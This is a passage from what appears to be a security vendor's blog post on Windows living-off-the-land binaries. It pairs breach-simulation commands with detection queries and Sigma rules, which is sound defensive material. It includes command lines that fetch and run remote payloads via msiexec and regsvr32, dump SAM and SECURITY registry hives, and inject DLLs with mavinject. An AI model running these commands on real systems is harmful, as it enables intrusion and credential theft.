out.\r\nExecution\r\n(Click for Larger)\r\nScenario IOCs\r\n[((process:binary_ref.name LIKE '%\\ie4uinit.exe'))]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe →\r\nie4uinit.exe\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 19 of 50\n\n(Click for Larger)\r\nSigma Rules\r\nIn order to detect the scenario you will need to delete the filter_missing field in the following rule:\r\n/rules/windows/process_creation/proc_creation_win_lolbin_ie4uinit.yml\r\nBack to Top\r\nIlasm.exe\r\nBinary description\r\nIlasm.exe is a command-line utility that is part of the Microsoft .NET Framework software development kit (SDK). It is\r\nused to compile Microsoft Intermediate Language (MSIL) code into executable files or dynamic-link libraries (DLLs).\r\nMSIL is a low-level programming language that is used by the .NET Framework. It is similar to assembly language and is\r\ndesigned to be platform-independent. MSIL code is compiled by the .NET just-in-time (JIT) compiler at runtime into native\r\nmachine code that can be executed by the computer’s processor.\r\nIlasm.exe can be used to create MSIL code from source code written in any .NET-supported programming language, such as\r\nC# or Visual Basic .NET. The resulting MSIL code can then be compiled into an executable file or DLL using ilasm.exe.\r\nTTPs and tactics\r\nDefense Evasion: Obfuscated Files or Information: Compile After Delivery (T1027.004)\r\nHow do the adversaries use it?\r\nAn attacker can deliver a source code file containing the malicious code to the target system and then use ilasm.exe to\r\ncompile the code into an executable file. By compiling the code on the target system, the attacker can avoid detection by\r\nsecurity software that may have signatures or behavioral patterns for known malicious executables.\r\nThe use of ilasm.exe in this context requires that the attacker has already gained access to the target system and has the\r\nnecessary permissions to execute the compiler. Once the code is compiled, the attacker can execute it to achieve their\r\nmalicious goals, such as stealing sensitive data or taking control of the compromised system.\r\nAttackIQ Scenarios\r\nCompile After Delivery using “ilasm.exe” Script\r\nDescription\r\nThis scenario will execute the following command:\r\nilasm.exe aiq_il_code.txt /exe\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 20 of 50\n\nThe content of the aiq_il_code.txt is:\r\n.assembly extern mscorlib { .publickeytoken = (B7 7A 5C 56 19 34 E0 89 ) .ver 4:0:0:0 } .assembly hello {\r\n.custom instance void [mscorlib]System.Runtime.CompilerServices.CompilationRelaxationsAttribute::.ctor(int32) =\r\n( 01 00 08 00 00 00 00 00 ) .custom instance void\r\n[mscorlib]System.Runtime.CompilerServices.RuntimeCompatibilityAttribute::.ctor() = ( 01 00 01 00 54 02 16 57 72\r\n61 70 4E 6F 6E 45 78 63 65 70 74 69 6F 6E 54 68 72 6F 77 73 01 ) .hash algorithm 0x00008004 .ver 0:0:0:0 }\r\n.module hello.exe .class private auto ansi beforefieldinit Program extends [mscorlib]System.Object { .method\r\nprivate static void Main() cil managed { .entrypoint .custom instance void\r\n[mscorlib]System.STAThreadAttribute::.ctor() = ( 01 00 00 00 ) .maxstack 8 IL_0000: nop IL_0001: ldstr\r\n\"AttackIQ binary has been spawned.\" IL_0006: call void [mscorlib]System.Console::WriteLine(string) IL_000b: nop\r\nIL_000c: ret } }\r\nAfter compiling the binary, the scenario will execute the compiled file and search for the message “AttackIQ binary has\r\nbeen spawned” in the stdout.\r\nExecution\r\n(Click for Larger)\r\nScenario IOCs\r\n[(process:binary_ref.name LIKE '%\\ilasm.exe')]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe →\r\nilasm.exe\r\non the other hand, the compiled binary (aiq_js_code.exe) will have the following one:\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe →\r\naiq_il_code.exe\r\n(Click for Larger)\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 21 of 50\n\nSigma Rules\r\n/rules/windows/process_creation/proc_creation_win_lolbin_ilasm.yml\r\nBack to Top\r\nJsc.exe\r\nBinary description\r\njsc.exe is a command-line tool that is included with Microsoft’s .NET Framework. It stands for “JavaScript Compiler” and is\r\nused to compile JavaScript code into .NET bytecode, which can be executed by the Common Language Runtime (CLR).\r\nThe jsc.exe tool can be used to create standalone applications, Windows services, or console applications that run on the\r\n.NET Framework. It can also be used to create code libraries that can be used by other .NET applications.\r\nTTPs and tactics\r\nDefense Evasion: Obfuscated Files or Information: Compile After Delivery (T1027.004)\r\nHow do the adversaries use it?\r\nAn attacker can deliver a source code file containing the malicious code to the target system and then use jsc.exe to compile\r\nthe code into an executable file. By compiling the code on the target system, the attacker can avoid detection by security\r\nsoftware that may have signatures or behavioral patterns for known malicious executables.\r\nThe use of jsc.exe in this context requires that the attacker has already gained access to the target system and has the\r\nnecessary permissions to execute the compiler. Once the code is compiled, the attacker can execute it to achieve their\r\nmalicious goals, such as stealing sensitive data or taking control of the compromised system.\r\nAttackIQ Scenarios\r\nCompile After Delivery using “jsc.exe” Script\r\nDescription\r\nThis scenario will execute the following command:\r\njsc.exe aiq_js_code.js\r\nThe content of the aiq_il_code.txt is:\r\nprint('AttackIQ compiled JScript binary has been executed');\r\nAfter compiling the binary, the scenario will execute the compiled file and search for the message “AttackIQ compiled\r\nJScript binary has been executed” in the stdout.\r\nThe scenario will be marked as Not Prevented if the message “AttackIQ compiled JScript binary has been executed” is\r\npresent in the stdout of the compiled binary execution.\r\nExecution\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 22 of 50\n\n(Click for Larger)\r\nScenario IOCs\r\n[(process:binary_ref.name LIKE '%\\jsc.exe' AND process:command_line LIKE '%.js%')]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe →\r\ncsc.exe → cvtres.exe\r\non the other hand, the compiled binary (aiq_js_code.exe) will have the following one:\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe →\r\naiq_js_code.exe\r\n(Click for Larger)\r\nSigma Rules\r\n/rules/windows/process_creation/proc_creation_win_lolbin_jsc.yml\r\nBack to Top\r\nMavinject.exe\r\nBinary description\r\nMavinject.exe is a legitimate Windows system file that is part of the Microsoft Application Virtualization (App-V) platform.\r\nThis file is used to inject or launch virtualized applications in the App-V environment. The App-V platform allows\r\napplications to be virtualized and streamed to client computers without the need for local installation.\r\nTTPs and tactics\r\nDefense Evasion: System Binary Proxy Execution: Mavinject (1218.013)\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 23 of 50\n\nHow do the adversaries use it?\r\nAdversaries may abuse mavinject.exe to inject malicious DLLs into running processes (i.e. Dynamic-link Library Injection),\r\nallowing for arbitrary code execution (ex.  C:\\Windows\\system32\\mavinject.exe PID /INJECTRUNNING PATH_DLL ). Since\r\nmavinject.exe may be digitally signed by Microsoft, proxying execution via this method may evade detection by security\r\nproducts because the execution is masked under a legitimate process.\r\nAttackIQ Scenarios\r\nSystem Binary Proxy Execution using “mavinject.exe” Script\r\nDescription\r\nThis scenario will execute a binary that will sleep for 15 seconds.\r\nAfter doing that, the scenario will grab its PID and execute the following command:\r\nmavinject.exe $sleep_pid /INJECTRUNNING injectable_dll.dll\r\nThe DLL injectable_dll.dll will create a file in the temp directory.\r\nThe scenario will verify if the file exists and mark the scenario as not prevented. The scenario will be marked as prevented if\r\nthe file does not exist.\r\nExecution\r\n(Click for Larger)\r\nScenario IOCs\r\n[((process:parent_ref.binary_ref.name != 'C:\\Windows\\System32\\AppVClient.exe') AND process:command_line LIKE\r\n'% /INJECTRUNNING %')]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe →\r\ncmd.exe → mavinject.exe\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 24 of 50\n\n(Click for Larger)\r\nSigma Rules\r\n/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml\r\nBack to Top\r\nMicrosoft.Workflow.Compiler.exe\r\nBinary description\r\nMicrosoft.Workflow.Compiler.exe is a command-line tool used in Microsoft’s Windows Workflow Foundation (WF) to\r\ncompile workflow definitions into executable code.\r\nTTPs and tactics\r\nDefense Evasion: Trusted Developer Utilities Proxy Execution (T1127)\r\nHow do the adversaries use it?\r\nAn adversary could use this, too to compile and execute C# or VB.net code in a XOML file.\r\nAttackIQ Scenarios\r\nTrusted Developer Utilities Proxy Execution using “Microsoft.Workflow.Compiler.exe” Script\r\nDescription\r\nThis scenario will execute the following command:\r\nMicrosoft.Workflow.Compiler.exe aiq_csharp_code.xml aiq_microsoft_workflow_compiler_results.xml\r\nIf the scenario is successful, the C# code will be executed and print “AttackIQ C# code has been executed” in the stdout. If\r\nthat string is present in the stdout the scenario will be marked as Not Prevented.\r\nExecution\r\nScenario IOCs\r\n[(process:binary_ref.name LIKE '%\\Microsoft.Workflow.Compiler.exe')]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe →\r\nMicrosoft.Workflow.Compiler.exe → csc.exe → cvtres.exe\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 25 of 50\n\n(Click for Larger)\r\nSigma Rules\r\n/rules/windows/process_creation/proc_creation_win_lolbin_workflow_compiler.yml\r\nBack to Top\r\nMsiexec.exe\r\nBinary description\r\nMsiexec.exe is an executable file that is part of the Microsoft Windows Installer (MSI) application. It is responsible for\r\ninstalling, modifying, and removing software applications on a Windows computer. MSI is a component of the Windows\r\noperating system that provides a standardized way of packaging software applications for distribution and installation\r\nTTPs and tactics\r\nDefense Evasion: System Binary Proxy Execution: Msiexec (T1218.007)\r\nHow do the adversaries use it?\r\nAdversaries may abuse msiexec.exe to proxy execution of malicious payloads such as local or network accessible MSI files\r\nor DLLs.\r\nAttackIQ Scenarios\r\nSystem Binary Proxy Execution using “msiexec.exe” Script\r\nDescription\r\nThis scenario will then execute the following command:\r\nmsiexec.exe /q /i http://malware.scenarios.attackiq-ntm.com/msi_create_file/aiq_msi.msi\r\nThe MSI file will create a file in the temp directory when opened.\r\nThe scenario will verify if the file exists and mark the scenario as not prevented. The scenario will be marked as prevented if\r\nthe file does not exist.\r\nExecution\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 26 of 50\n\n(Click for Larger)\r\nScenario IOCs\r\n[((process:binary_ref.name LIKE '%\\msiexec.exe') AND (process:command_line LIKE '%/i%' OR process:command_line\r\nLIKE '%-i%' OR process:command_line LIKE '%/package%' OR process:command_line LIKE '%-package%' OR\r\nprocess:command_line LIKE '%/a%' OR process:command_line LIKE '%-a%' OR process:command_line LIKE '%/j%' OR\r\nprocess:command_line LIKE '%-j%') AND (process:command_line LIKE '%/q%' OR process:command_line LIKE '%-q%')\r\nAND (process:command_line LIKE '%http%' OR process:command_line LIKE '%\\\\\\\\\\%'))]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe →\r\nmsiexec.exe\r\n(Click for Larger)\r\nSigma Rules\r\n/rules/windows/process_creation/proc_creation_win_msiexec_install_remote.yml\r\nBack to Top\r\nNetsh.exe\r\nBinary description\r\nNetsh is a command-line utility in Windows operating systems that allows you to configure and troubleshoot network\r\nsettings. It provides access to many network configuration options, including network interfaces, protocols, filters, and\r\nrouting tables.\r\nTTPs and tactics\r\nCredential Access: Network Sniffing (T1040)\r\nDiscovery: Network Sniffing (T1040)\r\nHow do the adversaries use it?\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 27 of 50\n\nAn adversary with administrative access to a Windows system could use netsh to capture and analyze network traffic.\r\nAttackIQ Scenarios\r\nNetwork Sniffing using “netsh.exe trace” Script\r\nDescription\r\nIn this scenario, the following actions will take place:\r\nThe scenario will execute netsh trace start capture=yes report=disabled\r\ntraceFile=C:\\Users\\Public\\aiq_netsh_trace_capture.etl\r\nThe scenario will ping 10 times the localhost to generate some traffic\r\nThe scenario will stop the capture.\r\nIf the aiq_netsh_trace_capture.etl file exists, the scenario will be marked as not prevented. Else, it will be marked as\r\nprevented.\r\nThis scenario requires admin privileges.\r\nExecution\r\n(Click for Larger)\r\nScenario IOCs\r\n[((process:binary_ref.name LIKE '%\\netsh.exe') AND (process:command_line LIKE '%start%' AND\r\nprocess:command_line LIKE '%trace%'))]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe →\r\nnetsh.exe\r\n(Click for Larger)\r\nSigma Rules\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 28 of 50\n\n/rules/windows/process_creation/proc_creation_win_netsh_packet_capture.yml\r\nBack to Top\r\nOdbcconf.exe\r\nBinary description\r\nodbcconf.exe is a command-line tool that is used to manage ODBC (Open Database Connectivity) data sources on Windows\r\noperating systems. ODBC is a standard software interface for accessing databases, and ODBC data sources are used to\r\ndefine the connection details for accessing a particular database.\r\nTTPs and tactics\r\nDefense Evasion: System Binary Proxy Execution: Odbcconf (T1218.008)\r\nHow do the adversaries use it?\r\nAdversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse.\r\nSimilar to Regsvr32, odbcconf.exe has a REGSVR flag that can be misused to execute DLLs\r\nAttackIQ Scenarios\r\nSystem Binary Proxy Execution using “odbcconf.exe” Script\r\nDescription\r\nThis scenario will execute the following command:\r\nodbcconf.exe -f odbc.rsp\r\nThe file odbc.rsp contains:\r\nREGSVR odbc.dll\r\nThe DLL odbc.dll will create a file in the temp directory.\r\nThe scenario will verify if the file exists and mark the scenario as not prevented. The scenario will be marked as prevented if\r\nthe file does not exist.\r\nScenario IOCs\r\n[(((process:binary_ref.name LIKE '%\\odbcconf.exe') AND (process:command_line LIKE '%-a%' OR\r\nprocess:command_line LIKE '%-f%' OR process:command_line LIKE '%/a%' OR process:command_line LIKE '%/f%' OR\r\nprocess:command_line LIKE '%regsvr%')) OR ((process:binary_ref.name LIKE '%\\rundll32.exe') AND\r\nprocess:parent_ref.binary_ref.name LIKE '%\\odbcconf.exe'))]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe →\r\nodbcconf.exe\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 29 of 50\n\n(Click for Larger)\r\nSigma Rules\r\n/rules/windows/process_creation/proc_creation_win_susp_odbcconf.yml\r\nBack to Top\r\nPcalua.exe\r\nBinary description\r\nPcalua.exe is a legitimate Windows executable file that stands for “Program Compatibility Assistant LUA” or “Program\r\nCompatibility Assistant Low User Access”. It is a component of the Windows operating system and is responsible for\r\ndetecting compatibility issues with software applications that are installed on your computer.\r\nTTPs and tactics\r\nDefense Evasion: System Binary Proxy Execution (T1218)\r\nHow do the adversaries use it?\r\nan attacker can exploit Pcalua.exe to run their own malicious code by disguising it as the legitimate file.\r\nAttackIQ Scenarios\r\nIndirect Command Execution using “pcalua.exe” Script\r\nDescription\r\nIn this scenario, the following actions will take place:\r\nA binary called AIQ_file_creator.exe would be dropped in the current working directory.\r\nThe command “pcalua.exe -a AIQ_file_creator.exe” will be executed.\r\nIf the execution succeeds, a folder and a file inside the TEMP directory will be created.\r\nIf the file exists, the scenario will be marked as “not prevented.” Else, it will be marked as “prevented.”\r\nExecution\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 30 of 50\n\n(Click for Larger)\r\nScenario IOCs\r\n[(process:binary_ref.name LIKE '%\\pcalua.exe' AND process:command_line LIKE '% -a%')]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe →\r\npcalua.exe → aiq_file_creator.exe\r\n(Click for Larger)\r\nSigma Rules\r\n/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml\r\nBack to Top\r\nPcwrun.exe\r\nBinary description\r\npcwrun.exe is the is a legitimate Windows executable that will execute the Program Compatibility Wizard.\r\nTTPs and tactics\r\nDefense Evasion: System Binary Proxy Execution (T1218)\r\nHow do the adversaries use it?\r\nAdversaries may abuse this binary by leveraging the MSDT follina vulnerability through Pcwrun to execute arbitrary\r\ncommands and binaries.\r\nAttackIQ Scenarios\r\nSystem Binary Proxy Execution using “pcwrun.exe” Script\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 31 of 50\n\nDescription\r\nIn this scenario, the following actions will take place:\r\nThe downloaded binary is copied into the C:\\Users\\Public folder.\r\nThe command pcwrun.exe /../../\\$(C:\\Users\\Public\\AIQ_file_creator.exe).exe is executed.\r\nIf the binary is successfully executed, a file should be created in the temp folder. If the file exists, the scenario will be\r\nmarked as not prevented. Else, the scenario will be marked as prevented.\r\nExecution\r\n(Click for Larger)\r\nScenario IOCs\r\n[process:parent_ref.binary_ref.name LIKE '%\\pcwrun.exe']\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe →\r\npcwrun.exe → msdt.exe\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe →\r\naiq_file_creator.exe\r\n(Click for Larger)\r\nSigma Rules\r\n/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun.yml\r\nBack to Top\r\nPktmon.exe\r\nBinary description\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 32 of 50\n\npktmon.exe is a command-line tool included in recent versions of Windows (starting from Windows 10) that allows users to\r\ncapture network traffic on their system. It is a lightweight packet monitoring tool that can capture and analyze network\r\ntraffic for troubleshooting and diagnostic purposes.\r\nTTPs and tactics\r\nCredential Access: Network Sniffing (T1040)\r\nDiscovery: Network Sniffing (T1040)\r\nHow do the adversaries use it?\r\nAn adversary with administrative access to a Windows system could use pktmon.exe to capture and analyze network traffic.\r\nAttackIQ Scenarios\r\nNetwork Sniffing using “pktmon.exe” Script\r\nDescription\r\nIn this scenario, the following actions will take place:\r\nThe scenario will execute pktmon.exe start –etw\r\nThe scenario will ping 10 times the localhost to generate some traffic\r\nThe scenario will stop the capture.\r\nIf the pktetl.etl file exists, the scenario will be marked as not prevented. Else, it will be marked as prevented.\r\nThis scenario requires admin privileges.\r\nExecution\r\n(Click for Larger)\r\nScenario IOCs\r\n[(process:binary_ref.name LIKE '%\\pktmon.exe')]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe →\r\npktmon.exe\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 33 of 50\n\n(Click for Larger)\r\nSigma Rules\r\n/rules/windows/process_creation/proc_creation_win_lolbin_pktmon.yml\r\nBack to Top\r\nPrint.exe\r\nBinary description\r\nprint.exe is the is a legitimate Windows executable that is used by Windows to send files to the printer.\r\nTTPs and tactics\r\nCommand and Control: Ingress Tool Transfer (T1105)\r\nHow do the adversaries use it?\r\nAdversaries may use print.exe to copy a file into the system.\r\nAttackIQ Scenarios\r\nCopy a file using “print.exe” Script\r\nDescription\r\nThis scenario will execute the following command:\r\nprint.exe /D:$env:temp\\$name helloworld.exe\r\nThe scenario will be marked as Not Prevented if the file is copied into the destination path.\r\nExecution\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 34 of 50\n\n(Click for Larger)\r\nScenario IOCs\r\n[((process:binary_ref.name LIKE '%\\print.exe' AND process:command_line LIKE '%.exe%' AND process:command_line\r\nLIKE '%/D%'))]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe →\r\nprint.exe\r\n(Click for Larger)\r\nSigma Rules\r\nin order to detect this scenario you will need to remove the filter and the line  CommandLine|startswith: 'print'  on this\r\nsigma rule:\r\n/rules/windows/process_creation/proc_creation_win_susp_print.yml\r\nBack to Top\r\nReg.exe\r\nBinary description\r\nReg.exe is a command-line tool that is included with Microsoft Windows operating systems. It is used to manage the\r\nWindows Registry, which is a hierarchical database that stores configuration settings and other information about the\r\noperating system and installed software.\r\nTTPs and tactics\r\nCredential Access: OS Credential Dumping: Security Account Manager (T1003.002)\r\nHow do the adversaries use it?\r\nAdversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through\r\nin-memory techniques or through the Windows Registry where the SAM database is stored.\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 35 of 50\n\nAttackIQ Scenarios\r\nDump Registry Hives using “reg.exe” Script\r\nDescription\r\nThis scenario will attempt to dump the SECURITY, SYSTEM, and SAM hives from the registry by running:\r\nreg.exe save HKLM\\SECURITY security.bak\r\nreg.exe save HKLM\\SYSTEM system.bak\r\nreg.exe save HKLM\\SAM sam.bak\r\nThis scenario requires admin privileges.\r\nExecution\r\n(Click for Larger)\r\nScenario IOCs\r\n[((process:binary_ref.name LIKE '%\\reg.exe') AND (process:command_line LIKE '%\\system%' OR\r\nprocess:command_line LIKE '%\\sam%' OR process:command_line LIKE '%\\security%' OR process:command_line LIKE\r\n'%\\ˢystem%' OR process:command_line LIKE '%\\syˢtem%' OR process:command_line LIKE '%\\ˢyˢtem%' OR\r\nprocess:command_line LIKE '%\\ˢam%' OR process:command_line LIKE '%\\ˢecurity%') AND (process:command_line LIKE\r\n'%hklm%' OR process:command_line LIKE '%hk˪m%' OR process:command_line LIKE '%hkey_local_machine%' OR\r\nprocess:command_line LIKE '%hkey_˪ocal_machine%' OR process:command_line LIKE '%hkey_loca˪_machine%' OR\r\nprocess:command_line LIKE '%hkey_˪oca˪_machine%') AND (process:command_line LIKE '%save%' OR\r\nprocess:command_line LIKE '%export%' OR process:command_line LIKE '%ˢave%' OR process:command_line LIKE\r\n'%eˣport%'))]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe →\r\nreg.exe\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 36 of 50\n\n(Click for Larger)\r\nSigma Rules\r\n/rules/windows/process_creation/proc_creation_win_reg_dumping_sensitive_hives.yml\r\nBack to Top\r\nRegasm.exe\r\nBinary description\r\nRegasm.exe is a tool provided by Microsoft’s .NET Framework that is used to register .NET assemblies for use in COM\r\ninterop scenarios. COM (Component Object Model) is a technology used to enable communication between software\r\ncomponents on Windows-based systems.\r\nTTPs and tactics\r\nDefense Evasion: System Binary Proxy Execution: Regsvcs/Regasm (T1218.009)\r\nHow do the adversaries use it?\r\nregasm.exe may be used to bypass application control through use of attributes within the binary to specify code that should\r\nbe run before registration or unregistration:  [ComRegisterFunction]  or  [ComUnregisterFunction]  respectively.\r\nAttackIQ Scenarios\r\nSystem Binary Proxy Execution using “regasm.exe” Script\r\nDescription\r\nThis scenario will register a custom DLL by executing:\r\nregasm.exe %temp%\\attackiq_regasm\\library.dll\r\nThe DLL will create a file in the temporary directory when loaded. The scenario will be marked as Not Prevent if the file\r\nexists.\r\nThis scenario requires admin privileges.\r\nExecution\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 37 of 50\n\n(Click for Larger)\r\nScenario IOCs\r\n[(((((process:command_line NOT LIKE '%\\Regasm.exe\"' AND process:command_line NOT LIKE '%\\Regasm.exe' AND\r\nprocess:command_line NOT LIKE '%\\Regsvcs.exe\"' AND process:command_line NOT LIKE '%\\Regsvcs.exe')) AND\r\n(process:command_line NOT LIKE '%.dll%')) AND ((process:binary_ref.name LIKE '%\\Regsvcs.exe' OR\r\nprocess:binary_ref.name LIKE '%\\Regasm.exe'))) OR (((process:binary_ref.name LIKE '%\\Regsvcs.exe' OR\r\nprocess:binary_ref.name LIKE '%\\Regasm.exe')) AND (process:command_line LIKE '%\\Users\\Public\\\\%' OR\r\nprocess:command_line LIKE '%\\AppData\\Local\\Temp\\\\%' OR process:command_line LIKE '%\\Desktop\\\\%' OR\r\nprocess:command_line LIKE '%\\Downloads\\\\%' OR process:command_line LIKE '%\\PerfLogs\\\\%' OR process:command_line\r\nLIKE '%\\Windows\\Temp\\\\%' OR process:command_line LIKE '%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\\\%')))]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → cmd.exe →\r\nregasm.exe\r\n(Click for Larger)\r\nSigma Rules\r\n/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml\r\nBack to Top\r\nRegSvr32.exe\r\nBinary description\r\nRegsvr32 is a Windows command-line utility that is used to register and unregister Dynamic Link Libraries (DLLs) and\r\nActiveX Controls in the Windows Registry.\r\nTTPs and tactics\r\nDefense Evasion: System Binary Proxy Execution: Regsvr32 (T1218.010)\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 38 of 50\n\nHow do the adversaries use it?\r\nMalicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded\r\nby, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal\r\noperations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM\r\nscriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be\r\nloaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation.\r\nThis method makes no changes to the Registry as the COM object is not actually registered, only executed. This variation of\r\nthe technique is often referred to as a “Squiblydoo” and has been used in campaigns targeting governments.\r\nAttackIQ Scenarios\r\nApplication Bypass using “regsvr32.exe” Script\r\nDescription\r\nThis scenario will execute the following command:\r\nregsvr32.exe /s /n /u /i:https://malware.scenarios.attackiq-ntm.com/regsvr32/regsvr32.xml scrobj.dll\r\nregsvr32.xml is a XML file that contains a JScript code that will execute a custom binary.\r\nThis binary will create a file in the TEMP directory.\r\nThe scenario will verify if the file exists and mark the scenario as not prevented. If the file does not exist, the scenario will\r\nbe marked as prevented.\r\nThis variation of the T1218.010 technique is often referred to as a “Squiblydoo” and has been used in campaigns targeting\r\ngovernments.\r\nExecution\r\n(Click for Larger)\r\nExecute DLL Through RegSvr32\r\nDescription\r\nProcess blacklisting is one of the most effective techniques to mitigate many threats. Therefore, being able to subvert such\r\ndefensive strategy is key for any attacker. The regsvr32 technique is used to bypass these type of defenses.\r\nThe regsvr32 Windows utility is used to register COM (Common Object Model) DLLs. This utility receives a DLL which is\r\nthe one that will be registered. Upon regsvr32 execution, the exported DllRegisterServer function from the DLL will be\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 39 of 50\n\nautomatically executed.\r\nThrough the execution of this legitimate regsvr32 Windows utility an attacker can execute arbitrary code while bypassing\r\nmost binary white and black listing strategies.\r\nThis scenario will execute the regsrv32 utility in order execute the DLL that will be registered. Through regsvr32, this DLL\r\nwill execute its DllRegisterServer function that will create a random file in the Windows temporary directory.\r\nExecution\r\n(Click for Larger)\r\nScenario IOCs\r\n[((((process:binary_ref.name LIKE '%\\cscript.exe' OR process:binary_ref.name LIKE '%\\wscript.exe') AND\r\nprocess:parent_ref.binary_ref.name LIKE '%\\regsvr32.exe') OR ((process:command_line LIKE '%.jpg' OR\r\nprocess:command_line LIKE '%.jpeg' OR process:command_line LIKE '%.png' OR process:command_line LIKE '%.gif' OR\r\nprocess:command_line LIKE '%.bin' OR process:command_line LIKE '%.tmp' OR process:command_line LIKE '%.temp' OR\r\nprocess:command_line LIKE '%.txt') AND process:binary_ref.name LIKE '%\\regsvr32.exe') OR ((process:command_line\r\nLIKE '%\\AppData\\Local%' OR process:command_line LIKE '%C:\\Users\\Public%') AND process:binary_ref.name LIKE\r\n'%\\regsvr32.exe') OR ((process:parent_ref.binary_ref.name LIKE '%\\powershell.exe' OR\r\nprocess:parent_ref.binary_ref.name LIKE '%\\pwsh.exe' OR process:parent_ref.binary_ref.name LIKE\r\n'%\\powershell_ise.exe') AND process:binary_ref.name LIKE '%\\regsvr32.exe') OR (process:binary_ref.name LIKE\r\n'%\\EXCEL.EXE' AND process:command_line LIKE '%..\\..\\..\\Windows\\System32\\regsvr32.exe %') OR\r\n(process:binary_ref.name LIKE '%\\regsvr32.exe' AND process:command_line LIKE '%/i:%' AND process:command_line\r\nLIKE '%ftp%' AND process:command_line LIKE '%scrobj.dll') OR (process:binary_ref.name LIKE '%\\regsvr32.exe' AND\r\nprocess:command_line LIKE '%/i:%' AND process:command_line LIKE '%http%' AND process:command_line LIKE\r\n'%scrobj.dll') OR (process:binary_ref.name LIKE '%\\regsvr32.exe' AND process:command_line LIKE '%\\Temp\\\\%') OR\r\n(process:binary_ref.name LIKE '%\\regsvr32.exe' AND process:parent_ref.binary_ref.name LIKE '%\\cmd.exe') OR\r\n(process:binary_ref.name LIKE '%\\regsvr32.exe' AND process:parent_ref.binary_ref.name LIKE '%\\mshta.exe')) AND\r\n(((process:command_line NOT LIKE '%\\AppData\\Local\\Microsoft\\Teams%' AND process:command_line NOT LIKE\r\n'%\\AppData\\Local\\WebEx\\WebEx64\\Meetings\\atucfobj.dll%')) AND (process:command_line NOT LIKE '%/s\r\nC:\\Windows\\System32\\RpcProxy\\RpcProxy.dll') AND (process:command_line NOT LIKE '%\\Program\r\nFiles\\Box\\Box\\Temp\\\\%' OR process:parent_ref.binary_ref.name != 'C:\\Program Files\\Box\\Box\\FS\\streem.exe')))]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → regsvr32.exe\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 40 of 50\n\n(Click for Larger)\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe →\r\nregsvr32.exe → aiq_binary_file_creation.exe\r\n(Click for Larger)\r\nSigma 